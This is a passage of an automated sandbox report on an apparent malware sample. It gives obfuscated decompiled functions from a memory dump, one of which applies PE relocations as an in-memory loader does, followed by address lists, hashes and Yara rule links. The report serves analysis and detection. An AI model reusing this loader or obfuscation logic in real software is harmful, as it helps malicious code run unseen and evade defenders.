							_t183 = _t538 + 0x41c6e2; // 0x41c6e2
							 *_t721 =  *_t721 - _t538;
							 *_t721 =  *_t721 | _t183;
							_t495 =  *((intOrPtr*)(_t538 + 0x41f060))(_t538,  *(_t704 - 0x10));
							_t588 = (_t574 & 0x00000000) +  *_t721;
							_t724 = _t721 - 0xfffffffc;
							 *_t724 =  *_t724 + _t645;
							_t651 = _t495;
							_t496 = _t651 + _t588;
							_t653 = 0;
							 *(_t704 - 0x10) = _t616;
							_t590 = _t588 & 0x00000000 ^ _t616 ^  *(_t704 - 0x10) ^  *(_t538 + 0x41c521);
							_t629 =  *(_t704 - 0x10);
							if(_t590 > _t496) {
								_t189 = _t538 + 0x41c8e1; // 0x41c8e1
								 *_t724 =  *_t724 & 0x00000000;
								 *_t724 =  *_t724 | _t189;
								_t190 = _t538 + 0x41c6e2; // 0x41c6e2
								 *_t724 = _t190;
								_t496 =  *((intOrPtr*)(_t538 + 0x41f064))( *(_t704 - 0x10), _t675);
							}
							 *(_t538 + 0x41c56c) =  *(_t538 + 0x41c56c) & 0x00000000;
							 *(_t538 + 0x41c56c) =  *(_t538 + 0x41c56c) ^ (_t704 & 0x00000000 | _t496);
							_t704 = _t704;
							 *_t724 =  *_t724 & 0x00000000;
							 *_t724 =  *_t724 + _t675;
							_t197 = _t538 + 0x41c266; // 0x41c266
							 *_t724 = _t197;
							_push( *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x10), _t496));
							_pop( *_t200);
							_push( *(_t704 - 0x10));
							_pop( *_t202);
							_t692 =  *_t675;
							_t203 = _t538 + 0x41ce1f; // 0x41ce1f
							 *_t724 =  *_t724 & 0x00000000;
							 *_t724 =  *_t724 ^ _t203;
							_t500 =  *((intOrPtr*)(_t538 + 0x41f060))(_t692);
							 *(_t704 - 0x10) = 0;
							 *_t724 =  *_t724 ^ _t500;
							_t207 = _t538 + 0x41c0ad; // 0x41c0ad
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t724 =  *_t724 | _t207;
							_t502 =  *((intOrPtr*)(_t538 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x10));
							_pop( *_t212);
							_t592 = _t590 & 0x00000000 |  *(_t704 - 0x14);
							 *_t214 = _t502;
							 *(_t704 - 0x10) =  *(_t704 - 0x10) + _t592;
							_push( *(_t704 - 0x10));
							_pop(_t503);
							_t631 = _t629;
							 *(_t704 - 0x10) = _t692;
							_t594 = _t592 & 0x00000000 | _t692 & 0x00000000 ^  *(_t538 + 0x41c765);
							_t695 =  *(_t704 - 0x10);
							if(_t594 > _t503) {
								_t221 = _t538 + 0x41ce1f; // 0x41ce1f
								 *_t724 = _t221;
								_t223 = _t538 + 0x41c0ad; // 0x41c0ad
								 *_t724 =  *_t724 & 0x00000000;
								 *_t724 =  *_t724 | _t223;
								_t503 =  *((intOrPtr*)(_t538 + 0x41f064))(_t704,  *(_t704 - 0x14));
							}
							 *_t724 = _t631;
							 *(_t538 + 0x41c497) = 0 ^ _t503;
							_t634 = 0;
							 *_t724 = _t653;
							_t654 = _t695;
							_t696 = _t654 +  *(_t704 + 8);
							_t656 = 0;
							_t227 = _t538 + 0x41d159; // 0x41d159
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t724 =  *_t724 ^ _t227;
							_t231 = _t538 + 0x41d213; // 0x41d213
							 *(_t704 - 0x10) = 0;
							 *_t724 =  *_t724 + _t231;
							_t506 =  *((intOrPtr*)(_t538 + 0x41f068))( *(_t704 - 0x10),  *(_t704 - 0x14));
							 *(_t704 - 0x14) = _t696;
							 *(_t538 + 0x41d182) =  *(_t538 + 0x41d182) & 0x00000000;
							 *(_t538 + 0x41d182) =  *(_t538 + 0x41d182) ^ (_t696 ^  *(_t704 - 0x14) | _t506);
							_t577 = _t594;
							_t242 = _t538 + 0x41c85c; // 0x41c85c
							 *_t724 =  *_t724 & 0x00000000;
							 *_t724 =  *_t724 | _t242;
							_t243 = _t538 + 0x41c10e; // 0x41c10e
							 *_t724 = _t243;
							_t509 =  *((intOrPtr*)(_t538 + 0x41f068))( *(_t704 - 0x14), _t634);
							 *(_t538 + 0x41ce00) =  *(_t538 + 0x41ce00) & 0x00000000;
							 *(_t538 + 0x41ce00) =  *(_t538 + 0x41ce00) | _t634 & 0x00000000 | _t509;
							_t637 = _t634;
							_push( *(_t704 - 0x14) + 2);
							_pop( *_t250);
							_push( *(_t704 - 0x14));
							_pop( *_t252);
							_t253 = _t538 + 0x41c9a3; // 0x41c9a3
							 *(_t704 - 0x14) =  *(_t704 - 0x14) & 0x00000000;
							 *_t724 =  *_t724 ^ _t253;
							_t257 = _t538 + 0x41d1fa; // 0x41d1fa
							 *_t724 = _t257;
							_t512 =  *((intOrPtr*)(_t538 + 0x41f068))( *(_t704 - 0x14),  *(_t704 - 0x14));
							 *_t724 = _t637;
							 *((intOrPtr*)(_t538 + 0x41d0fe)) = _t512;
							_t622 = 0;
							_t675 = 0 ^  *_t724;
							_t721 =  &(_t724[1]);
							_t261 = _t538 + 0x41d0af; // 0x41d0af
							 *_t721 =  *_t721 & 0x00000000;
							 *_t721 =  *_t721 | _t261;
							_t262 = _t538 + 0x41ceae; // 0x41ceae
							 *_t721 = _t262;
							_t459 =  *((intOrPtr*)(_t538 + 0x41f068))( *(_t704 - 0x10), _t577);
							 *(_t704 - 0x10) = _t656;
							 *(_t538 + 0x41c8cd) =  *(_t538 + 0x41c8cd) & 0x00000000;
							 *(_t538 + 0x41c8cd) =  *(_t538 + 0x41c8cd) ^ _t656 -  *(_t704 - 0x10) ^ _t459;
							_t645 =  *(_t704 - 0x10);
						}
						 *(_t704 - 0x10) = _t540;
						_t543 =  *(_t704 - 0x10);
						_t299 = _t543 + 0x41cb0b; // 0x41cb0b
						 *(_t704 - 0x14) = 0;
						 *_t721 =  *_t721 | _t299;
						_t463 =  *((intOrPtr*)(_t543 + 0x41f060))( *(_t704 - 0x14));
						 *_t721 = _t463;
						_t304 = _t543 + 0x41cda5; // 0x41cda5
						 *_t721 = _t304;
						_t465 =  *((intOrPtr*)(_t543 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x10));
						_t722 = _t721 - 0xfffffffc;
						 *_t722 =  *_t722 ^ _t704;
						_t705 = _t465;
						_t466 = _t705 +  *_t721;
						_t707 = 0;
						 *(_t707 - 0x14) = _t675;
						_t580 =  *(_t543 + 0x41c96a);
						_t678 =  *(_t707 - 0x14);
						if(_t580 > _t466) {
							_t310 = _t543 + 0x41cb0b; // 0x41cb0b
							 *_t722 =  *_t722 & 0x00000000;
							 *_t722 =  *_t722 | _t310;
							_t311 = _t543 + 0x41cda5; // 0x41cda5
							 *(_t707 - 0x14) =  *(_t707 - 0x14) & 0x00000000;
							 *_t722 =  *_t722 | _t311;
							_t466 =  *((intOrPtr*)(_t543 + 0x41f064))( *(_t707 - 0x14), _t707);
						}
						 *_t316 = _t466;
						 *_t318 =  *(_t707 - 0x10);
						_t722[1] =  *(_t707 - 0xc);
						_t545 = _t543;
						_t321 = _t545 + 0x41cee2; // 0x41cee2
						 *_t722 = _t321;
						_t323 = _t545 + 0x41d33a; // 0x41d33a
						 *(_t707 - 0x14) = 0;
						 *_t722 =  *_t722 | _t323;
						_t469 =  *((intOrPtr*)(_t545 + 0x41f068))( *(_t707 - 0x14),  *(_t707 - 0x10), _t580);
						 *(_t545 + 0x41d1da) =  *(_t545 + 0x41d1da) & 0x00000000;
						 *(_t545 + 0x41d1da) =  *(_t545 + 0x41d1da) | _t678 -  *_t722 | _t469;
						_t681 = _t678;
						 *(_t707 - 0x10) = _t645;
						_t648 =  *(_t707 - 0x10);
						 *_t722 =  *_t722 - _t622;
						 *_t722 =  *_t722 ^ (_t469 & 0x00000000 | _t645 ^  *(_t707 - 0x10) |  *(_t707 - 4));
						_t335 = _t545 + 0x41d2b3; // 0x41d2b3
						 *_t722 =  *_t722 - _t622;
						 *_t722 = _t335;
						_t336 = _t545 + 0x41cb87; // 0x41cb87
						 *(_t707 - 0x10) =  *(_t707 - 0x10) & 0x00000000;
						 *_t722 =  *_t722 + _t336;
						_t474 =  *((intOrPtr*)(_t545 + 0x41f068))( *(_t707 - 0x10), _t622, _t622);
						 *(_t707 - 0x10) = _t580;
						 *(_t545 + 0x41cf9a) =  *(_t545 + 0x41cf9a) & 0x00000000;
						 *(_t545 + 0x41cf9a) =  *(_t545 + 0x41cf9a) | _t580 ^  *(_t707 - 0x10) | _t474;
						_t583 =  *(_t707 - 0x10);
						_t723 =  &(_t722[1]);
						 *(_t707 - 0x10) = 0;
						 *_t723 =  *_t723 ^  *_t722;
						_t350 = _t545 + 0x41c922; // 0x41c922
						 *(_t707 - 0x10) = 0;
						 *_t723 =  *_t723 | _t350;
						_t353 = _t545 + 0x41c97d; // 0x41c97d
						 *_t723 =  *_t723 & 0x00000000;
						 *_t723 =  *_t723 + _t353;
						_t479 =  *((intOrPtr*)(_t545 + 0x41f068))(_t583,  *(_t707 - 0x10),  *(_t707 - 0x10));
						 *(_t545 + 0x41cae1) =  *(_t545 + 0x41cae1) & 0x00000000;
						 *(_t545 + 0x41cae1) =  *(_t545 + 0x41cae1) | _t707 & 0x00000000 | _t479;
						_t704 = _t707;
						_t480 =  *((intOrPtr*)(_t545 + 0x41f050))();
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 + _t480;
						_t362 = _t545 + 0x41c197; // 0x41c197
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 | _t362;
						_t482 =  *((intOrPtr*)(_t545 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x14));
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 | _t482;
						_t368 = _t545 + 0x41c46f; // 0x41c46f
						 *(_t704 - 0x14) = 0;
						 *_t723 =  *_t723 ^ _t368;
						_t484 =  *((intOrPtr*)(_t545 + 0x41f060))( *(_t704 - 0x14),  *(_t704 - 0x14));
						_pop( *_t372);
						_t585 = (_t583 & 0x00000000) +  *(_t704 - 0x10);
						 *_t374 = _t484;
						 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t585;
						_push( *(_t704 - 0x14));
						_pop(_t485);
						_t547 = _t545;
						 *(_t704 - 0x10) = _t648;
						_t574 = _t585 & 0x00000000 ^ _t648 -  *(_t704 - 0x10) ^  *(_t547 + 0x41c9d0);
						_t645 =  *(_t704 - 0x10);
						if(_t574 > _t485) {
							_t382 = _t547 + 0x41c197; // 0x41c197
							 *_t723 =  *_t723 & 0x00000000;
							 *_t723 =  *_t723 + _t382;
							_t383 = _t547 + 0x41c46f; // 0x41c46f
							 *(_t704 - 0x10) = 0;
							 *_t723 =  *_t723 ^ _t383;
							_t485 =  *((intOrPtr*)(_t547 + 0x41f064))( *(_t704 - 0x10), _t681);
							 *(_t547 + 0x41cfe1) =  *(_t547 + 0x41cfe1) & 0x00000000;
							 *(_t547 + 0x41cfe1) =  *(_t547 + 0x41cfe1) | _t704 ^  *_t723 ^ _t485;
							_t704 = _t704;
						}
						_t721 =  &(_t723[1]);
						 *_t721 =  *_t721 ^ _t704;
						 *_t721 = _t681;
						 *_t721 = _t485 & 0x00000000 |  *_t723;
						_t490 = 0;
						 *_t721 = _t622;
						 *((intOrPtr*)( *((intOrPtr*)(_t704 - 8)))) = _t490;
						_t625 = 0;
						 *_t392 = _t704;
						 *_t721 = 4;
						_t491 = _t547;
						 *_t394 = 0 ^  *(_t704 - 0x14);
						 *(_t704 - 0x14) =  *(_t704 - 0x14) + _t491;
						_t675 =  *(_t704 - 0x14);
						_t616 = _t625;
						 *_t399 =  *((intOrPtr*)(_t704 - 8));
						 *(_t704 - 0x10) =  *(_t704 - 0x10) + _t491;
						 *_t403 =  *(_t704 - 0x10);
						_t538 = _t547;
						if( *_t675 != 0) {
							goto L9;
						}
						goto L21;
					}
				}
			}

0x02275a25
0x02275a25
0x02275a25
0x02275a2b
0x02275a2c
0x02275a30
0x02275a33
0x02275a39
0x02275a40
0x02275a46
0x02275a49
0x02275a49
0x02275a4d
0x02275a51
0x02275a59
0x02275a5c
0x02275a5f
0x02275a67
0x02275a6e
0x02275a74
0x02275a75
0x02275a7f
0x02275a83
0x02275a8d
0x02275a91
0x02275a94
0x02275a9a
0x02275aa1
0x02275aa7
0x02275aaa
0x02275ab8
0x02275abb
0x02275ac5
0x02275ac9
0x02275acc
0x02275ad2
0x02275ada
0x02275ae1
0x02275ae7
0x02275aea
0x02275aea
0x02275af8
0x02275afb
0x02275b01
0x02275b0b
0x02275b0e
0x02275b17
0x02275b1a
0x02275b23
0x02275b26
0x02275b35
0x02275b3a
0x02275b3e
0x02275b41
0x02275b43
0x02275b44
0x02275b4f
0x02275b51
0x02275b56
0x02275b58
0x02275b5f
0x02275b63
0x02275b66
0x02275b6c
0x02275b73
0x02275b76
0x02275b76
0x02275b7d
0x02275b83
0x02275b8e
0x02275b92
0x02275b93
0x02275b9c
0x02275b9f
0x02275ba5
0x02275baf
0x02275bb2
0x02275bbe
0x02275bc5
0x02275bcb
0x02275bcc
0x02275bda
0x02275bde
0x02275be1
0x02275be4
0x02275beb
0x02275bee
0x02275bf1
0x02275bf7
0x02275bfe
0x02275c01
0x02275c07
0x02275c0f
0x02275c16
0x02275c1c
0x02275c28
0x02275c2b
0x02275c35
0x02275c38
0x02275c3e
0x02275c48
0x02275c4b
0x02275c52
0x02275c56
0x02275c59
0x02275c65
0x02275c6c
0x02275c72
0x02275c73
0x02275c79
0x02275c83
0x02275c86
0x02275c8c
0x02275c96
0x02275c99
0x02275c9f
0x02275ca9
0x02275cac
0x02275cb2
0x02275cbc
0x02275cbf
0x02275ccb
0x02275cce
0x02275cd5
0x02275cd8
0x02275cdb
0x02275cde
0x02275cdf
0x02275ce0
0x02275cef
0x02275cf1
0x02275cf6
0x02275cf8
0x02275cff
0x02275d03
0x02275d06
0x02275d0c
0x02275d16
0x02275d19
0x02275d25
0x02275d2c
0x02275d32
0x02275d32
0x02275d3c
0x02275d40
0x02275d43
0x02275d48
0x02275d52
0x02275d55
0x02275d5c
0x02275d5e
0x02275d61
0x02275d68
0x02275d6f
0x02275d74
0x02275d77
0x02275d7d
0x02275d7e
0x02275d85
0x02275d88
0x02275d8e
0x02275d91
0x02275d95
0x00000000
0x00000000
0x02275d9b
0x02275da4
0x02275da6
0x02275daa
0x02275314
0x02275405
0x0227540b
0x0227540c
0x02275413
0x02275417
0x0227541a
0x02275421
0x02275424
0x02275427
0x02275433
0x0227543a
0x02275440
0x0227531a
0x0227531a
0x02275320
0x0227532a
0x0227532d
0x02275333
0x0227533a
0x02275343
0x02275346
0x02275349
0x0227534c
0x0227534d
0x02275356
0x02275359
0x02275365
0x0227536c
0x02275372
0x02275372
0x02275445
0x02275445
0x02275448
0x0227544f
0x02275452
0x02275455
0x0227545d
0x02275464
0x0227546a
0x0227546b
0x0227546e
0x02275477
0x0227547a
0x02275480
0x02275487
0x0227548a
0x02275491
0x02275495
0x02275498
0x022754a0
0x022754a3
0x022754aa
0x022754ad
0x022754b0
0x022754b3
0x022754b4
0x022754b5
0x022754c4
0x022754c6
0x022754cb
0x022754cd
0x022754d6
0x022754d9
0x022754df
0x022754e6
0x022754e9
0x022754e9
0x022754ef
0x022754f7
0x022754fe
0x02275504
0x02275507
0x02275515
0x02275519
0x0227551d
0x02275520
0x02275527
0x0227552b
0x0227552e
0x02275535
0x02275539
0x0227553c
0x02275542
0x0227554a
0x02275551
0x02275557
0x0227555a
0x02275562
0x02275565
0x02275568
0x0227556b
0x0227556e
0x0227556f
0x02275576
0x02275579
0x0227557c
0x02275582
0x0227558c
0x02275595
0x02275596
0x02275599
0x0227559c
0x022755a2
0x022755a5
0x022755a8
0x022755ab
0x022755ad
0x022755b1
0x022755b4
0x022755bb
0x022755be
0x022755c1
0x022755c7
0x022755cf
0x022755d6
0x022755dc
0x022755e8
0x022755eb
0x022755ed
0x022755f0
0x022755f1
0x022755fb
0x022755fe
0x02275607
0x0227560a
0x02275611
0x02275614
0x02275617
0x0227561d
0x02275624
0x02275627
0x0227562f
0x02275632
0x02275635
0x0227563c
0x0227563d
0x02275640
0x0227564e
0x02275650
0x02275653
0x02275655
0x0227565b
0x02275662
0x02275665
0x0227566b
0x02275675
0x02275678
0x0227567e
0x02275685
0x0227568b
0x0227568b
0x02275694
0x0227569c
0x022756a0
0x022756a4
0x022756a6
0x022756a8
0x022756ac
0x022756af
0x022756b8
0x022756bb
0x022756c2
0x022756c6
0x022756c9
0x022756cf
0x022756d6
0x022756dc
0x022756e1
0x022756e4
0x022756e8
0x022756eb
0x022756ee
0x022756f4
0x022756fe
0x02275701
0x02275707
0x0227570f
0x02275716
0x0227571f
0x02275725
0x0227572f
0x02275732
0x02275738
0x02275742
0x02275745
0x0227574b
0x02275753
0x0227575a
0x02275760
0x0227576c
0x0227576f
0x02275777
0x0227577b
0x0227577e
0x02275781
0x0227578a
0x0227578d
0x02275794
0x02275797
0x0227579a
0x022757a0
0x022757a7
0x022757ad
0x00000000
0x022757ad
0x02275dbb
0x02275dbe
0x02275dd0
0x022757b0
0x022757b6
0x00000000
0x022757bc
0x022757bc
0x022757c3
0x022757c6
0x022757c9
0x022757cf
0x022757d9
0x022757dc
0x022757e3
0x022757e6
0x022757e9
0x022757f5
0x022757f8
0x022757fd
0x02275801
0x02275804
0x02275806
0x02275807
0x02275816
0x02275818
0x0227581d
0x0227581f
0x02275826
0x0227582a
0x0227582d
0x02275836
0x02275839
0x02275839
0x02275845
0x0227584c
0x02275852
0x02275854
0x02275858
0x0227585b
0x02275864
0x0227586d
0x0227586e
0x02275871
0x02275874
0x0227587a
0x0227587c
0x02275883
0x02275887
0x0227588a
0x02275890
0x0227589a
0x0227589d
0x022758a3
0x022758aa
0x022758ad
0x022758b9
0x022758bc
0x022758c3
0x022758c6
0x022758c9
0x022758cc
0x022758cd
0x022758ce
0x022758dd
0x022758df
0x022758e4
0x022758e6
0x022758ef
0x022758f2
0x022758f9
0x022758fd
0x02275900
0x02275900
0x02275908
0x0227590f
0x02275915
0x02275918
0x0227591c
0x02275920
0x02275922
0x02275923
0x02275929
0x02275930
0x02275933
0x02275939
0x02275943
0x02275946
0x0227594c
0x02275954
0x0227595b
0x0227596f
0x02275970
0x02275977
0x0227597b
0x0227597e
0x02275987
0x0227598a
0x02275996
0x0227599d
0x022759a3
0x022759a4
0x022759a5
0x022759a8
0x022759ab
0x022759ae
0x022759b4
0x022759bb
0x022759be
0x022759c7
0x022759ca
0x022759d2
0x022759d9
0x022759df
0x022759e2
0x022759e5
0x022759e8
0x022759ef
0x022759f3
0x022759f6
0x022759ff
0x02275a02
0x02275a08
0x02275a10
0x02275a17
0x02275a1d
0x02275a1d
0x02275aea
0x02275af8
0x02275afb
0x02275b01
0x02275b0b
0x02275b0e
0x02275b17
0x02275b1a
0x02275b23
0x02275b26
0x02275b35
0x02275b3a
0x02275b3e
0x02275b41
0x02275b43
0x02275b44
0x02275b4f
0x02275b51
0x02275b56
0x02275b58
0x02275b5f
0x02275b63
0x02275b66
0x02275b6c
0x02275b73
0x02275b76
0x02275b76
0x02275b7d
0x02275b83
0x02275b8e
0x02275b92
0x02275b93
0x02275b9c
0x02275b9f
0x02275ba5
0x02275baf
0x02275bb2
0x02275bbe
0x02275bc5
0x02275bcb
0x02275bcc
0x02275bda
0x02275bde
0x02275be1
0x02275be4
0x02275beb
0x02275bee
0x02275bf1
0x02275bf7
0x02275bfe
0x02275c01
0x02275c07
0x02275c0f
0x02275c16
0x02275c1c
0x02275c28
0x02275c2b
0x02275c35
0x02275c38
0x02275c3e
0x02275c48
0x02275c4b
0x02275c52
0x02275c56
0x02275c59
0x02275c65
0x02275c6c
0x02275c72
0x02275c73
0x02275c79
0x02275c83
0x02275c86
0x02275c8c
0x02275c96
0x02275c99
0x02275c9f
0x02275ca9
0x02275cac
0x02275cb2
0x02275cbc
0x02275cbf
0x02275ccb
0x02275cce
0x02275cd5
0x02275cd8
0x02275cdb
0x02275cde
0x02275cdf
0x02275ce0
0x02275cef
0x02275cf1
0x02275cf6
0x02275cf8
0x02275cff
0x02275d03
0x02275d06
0x02275d0c
0x02275d16
0x02275d19
0x02275d25
0x02275d2c
0x02275d32
0x02275d32
0x02275d3c
0x02275d40
0x02275d43
0x02275d48
0x02275d52
0x02275d55
0x02275d5c
0x02275d5e
0x02275d61
0x02275d68
0x02275d6f
0x02275d74
0x02275d77
0x02275d7d
0x02275d7e
0x02275d85
0x02275d88
0x02275d8e
0x02275d91
0x02275d95
0x00000000
0x00000000
0x00000000
0x02275d95
0x02275aea

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b22095e20c329f7d375c50b2b4e61b093e339a4e4c2e62bd3b86910ad18266d0
Instruction ID: e6c19143df68322d87018e81d65bb52359e1cfccd249fa4d0c16dcc893a9acf1
Opcode Fuzzy Hash: b22095e20c329f7d375c50b2b4e61b093e339a4e4c2e62bd3b86910ad18266d0
Instruction Fuzzy Hash: ADC135B2844219DFEF04DFA0C8897EEBBF5FF08310F15086DD989AA145D3742664CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 02272FAF, Relevance: .2, Instructions: 210
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E02272FAF(void* __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int __edi, void* __esi, signed int _a4) {
				char _v2;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _t60;
				signed int _t62;
				void* _t63;
				void* _t64;
				signed int _t65;
				signed int _t68;
				signed int _t74;
				void* _t77;
				signed int _t80;
				void* _t81;
				void* _t83;
				void* _t86;
				void* _t90;
				void* _t92;
				void* _t93;
				void* _t95;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				signed int _t105;
				signed int _t107;
				signed int _t108;
				signed int _t109;
				signed int _t111;
				signed int _t114;
				void* _t117;
				signed int _t120;
				signed int _t127;
				void* _t128;
				signed int _t130;
				signed int _t133;
				signed int _t140;
				signed int _t143;
				signed int _t145;
				void* _t148;
				signed int _t150;
				signed int _t151;
				signed int _t154;
				signed int _t156;
				void* _t161;
				signed int _t163;
				signed int _t164;
				void* _t167;
				signed int _t169;
				void* _t170;
				signed int* _t173;

				_t114 = __edx;
				_v16 = 0;
				_push(_v16);
				 *_t173 =  *_t173 + __esi;
				_v16 = _v16 & 0x00000000;
				_push(_v16);
				 *_t173 =  *_t173 | __edi;
				_push(__esi);
				_t140 =  *_t173;
				 *_t173 =  *(__ebx + 0x41c166);
				_pop( *_t8);
				_v16 = __ebx;
				_t74 = _v16;
				_t163 = _a4 | _a4;
				_t127 = _t163;
				_t164 = _t161;
				if(_t163 != 0) {
					 *_t173 = __ecx;
					_t90 = _t127;
					_t128 = _t90 +  *((intOrPtr*)(_t127 + 0x3c));
					_t92 = 0;
					 *_t14 =  *((intOrPtr*)(_t128 + 0x34));
					_push(_v16);
					_pop(_t60);
					_v12 = _v12 - _t60;
					_t77 = _t74;
					_v16 = _t140;
					_v8 = _v8 & 0x00000000;
					_v8 = _v8 | _t140 & 0x00000000 ^ _t60;
					_t143 = _v16;
					 *_t173 =  *_t173 + _t92;
					_t93 = _t128;
					_t95 = 0;
					_t130 = _t93 + ( *(_t128 + 0x14) & 0x0000ffff) + 0xffffffc0;
					_t98 = _t95;
					 *_t173 = _t164;
					_t62 =  *_t130;
					_t167 = 0;
					 *_t173 =  *_t173 | _t62;
					_t63 = _t62;
					if( *_t173 != 0) {
						_t80 = _t77;
						 *_t27 = _t63;
						_v16 = _v16 + _v12;
						_push(_v16);
						_pop(_t64);
						_t145 = _t143;
						_push(_t98 & 0x00000000 ^ (_t77 -  *_t173 |  *(_t130 + 4)));
						 *_t32 = _t64;
						_v16 = _v16 + _v8;
						_push(_v16);
						_pop(_t65);
						_pop(_t102);
						_t133 = _t130;
						_v16 = _t65;
						_push(_v12 + (_t145 & 0x00000000 | _t130 & 0x00000000 ^ _v8));
						_t68 = _v16;
						_pop(_t148);
						while(1) {
							_t150 = _t102 | _t102;
							_t103 = _t150;
							_t151 = _t148;
							if(_t150 == 0) {
								goto L12;
							}
							_t117 = _t114;
							 *_t173 =  *_t173 ^ _t80;
							_push(_t133 & 0x00000000 | _t114 & 0x00000000 |  *_t68);
							_pop(_t81);
							_t133 = _t81 + _t151;
							_t83 = 0;
							_v16 = _v16 & 0x00000000;
							_push(_v16);
							 *_t173 =  *_t173 | _t103;
							_v16 = _t151;
							_t105 = _t103 & 0x00000000 | _t151 - _v16 ^  *(_t68 + 4);
							_t154 = _v16;
							_v16 = 0;
							_push(_v16);
							 *_t173 =  *_t173 + _t105;
							_t86 = _t83;
							_t107 = _t105 + 0xfffffff8 >> 1;
							_t68 = _t68 + 8;
							_t120 = _t117;
							while(1) {
								_t156 = _t107 | _t107;
								_t108 = _t156;
								_t154 = _t154;
								if(_t156 == 0) {
									break;
								}
								_v16 = 0;
								_push(_v16);
								 *_t173 =  *_t173 | _t108;
								 *_t173 = 0xf000;
								_t109 = _t133;
								_t111 = 0 ^  *_t173;
								_t173 =  &(_t173[1]);
								_t169 =  *_t68 & 0x0000ffff & _t109 |  *_t68 & 0x0000ffff & _t109;
								_t120 = _t169;
								_t170 = _t167;
								if(_t169 != 0) {
									_t120 =  *_t68 & 0xfff;
									_push(_v16);
									 *_t173 = _t68;
									_t154 = _t154;
									 *((intOrPtr*)(_t120 + _t133)) =  *((intOrPtr*)(_t120 + _t133)) + (_t68 & 0x00000000 | _t154 & 0x00000000 | _v12);
									_pop( *_t55);
									_t68 = _v16;
								}
								_t68 =  &_v2;
								_t167 = _t170;
								_t107 = _t111 - 1;
							}
							_t114 = _t120 & 0x00000000 ^  *_t173;
							_t173 =  &(_t173[1]);
							_pop( *_t57);
							_t102 = (_t108 & 0x00000000 ^ _v16) - _t114;
							_t80 = _t86;
						}
					} else {
					}
				} else {
				}
				L12:
				return _t68;
			}

0x02272faf
0x02272fb5
0x02272fbc
0x02272fbf
0x02272fc2
0x02272fc6
0x02272fc9
0x02272fcc
0x02272fd3
0x02272fd3
0x02272fd6
0x02272fd9
0x02272fe3
0x02272fe9
0x02272feb
0x02272fed
0x02272fee
0x02272ff7
0x02272ffb
0x02272fff
0x02273001
0x02273005
0x02273008
0x0227300b
0x02273012
0x02273015
0x02273016
0x0227301e
0x02273022
0x02273025
0x0227302e
0x02273032
0x02273037
0x02273041
0x02273043
0x02273046
0x0227304d
0x0227304f
0x02273051
0x02273054
0x02273055
0x02273068
0x0227306e
0x02273071
0x02273074
0x02273077
0x02273078
0x02273079
0x0227307e
0x02273081
0x02273084
0x02273087
0x02273088
0x02273095
0x02273096
0x0227309e
0x0227309f
0x022730a2
0x0227318d
0x02273190
0x02273192
0x02273194
0x02273195
0x00000000
0x00000000
0x022730b3
0x022730b6
0x022730b9
0x022730ba
0x022730bd
0x022730bf
0x022730c0
0x022730c4
0x022730c7
0x022730ca
0x022730d6
0x022730d8
0x022730db
0x022730e2
0x022730e5
0x022730f3
0x022730f4
0x022730ff
0x02273101
0x02273163
0x02273166
0x02273168
0x0227316a
0x0227316b
0x00000000
0x00000000
0x02273107
0x0227310e
0x02273111
0x02273115
0x0227311c
0x02273121
0x02273124
0x0227312a
0x0227312c
0x0227312e
0x0227312f
0x02273134
0x0227313a
0x0227313d
0x0227314c
0x0227314d
0x02273150
0x02273153
0x02273153
0x0227315f
0x02273161
0x02273162
0x02273162
0x02273173
0x02273176
0x0227317f
0x0227318a
0x0227318c
0x0227318c
0x00000000
0x02273057
0x00000000
0x02272ff0
0x0227319b
0x022731b0

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1f32643c1a337532a551df5e7dd1d687da03bae7b11c336c53ee130eebd2aab
Instruction ID: de880966de1cd7a562bab1f48dbc12045536d066ac762ddf65e77d85115cc20f
Opcode Fuzzy Hash: d1f32643c1a337532a551df5e7dd1d687da03bae7b11c336c53ee130eebd2aab
Instruction Fuzzy Hash: C2618333E18618AFEB048FD9DC457ADFBB5EF44720F1581BEE594A3290DBB429008B94

Uniqueness

Uniqueness Score: -1.00%

Function 02272A69, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
Instruction ID: d9056196ad09b0d8eddcf096162854aaabbf38c23bc0109fd5bf8ccac3f0a6d1
Opcode Fuzzy Hash: b63c40a153435aee46f1dbaa00f0c7709c3ef757da9a005839b873438a636a49
Instruction Fuzzy Hash: E651BF73D14504EFEB04DFA9D98279EB7B1FF80320F1A86A9C895A7284C7746610CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0227150C, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240076891.0000000002270000.00000040.00000001.sdmp, Offset: 02270000, based on PE: true

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd97c8a2378453d0f50524401d41f85624529e01a0f8e400ad16fc78b9557928
Instruction ID: b7879931f6e52d16eb8bb9f1a1ec72387021f44c7a414ed8f9e54ed964696503
Opcode Fuzzy Hash: cd97c8a2378453d0f50524401d41f85624529e01a0f8e400ad16fc78b9557928
Instruction Fuzzy Hash: 63413C72C21604ABEB04CF76CA857DA7B71EF44330F24C3A9AC399A0D9C3788651AF55

Uniqueness

Uniqueness Score: -1.00%

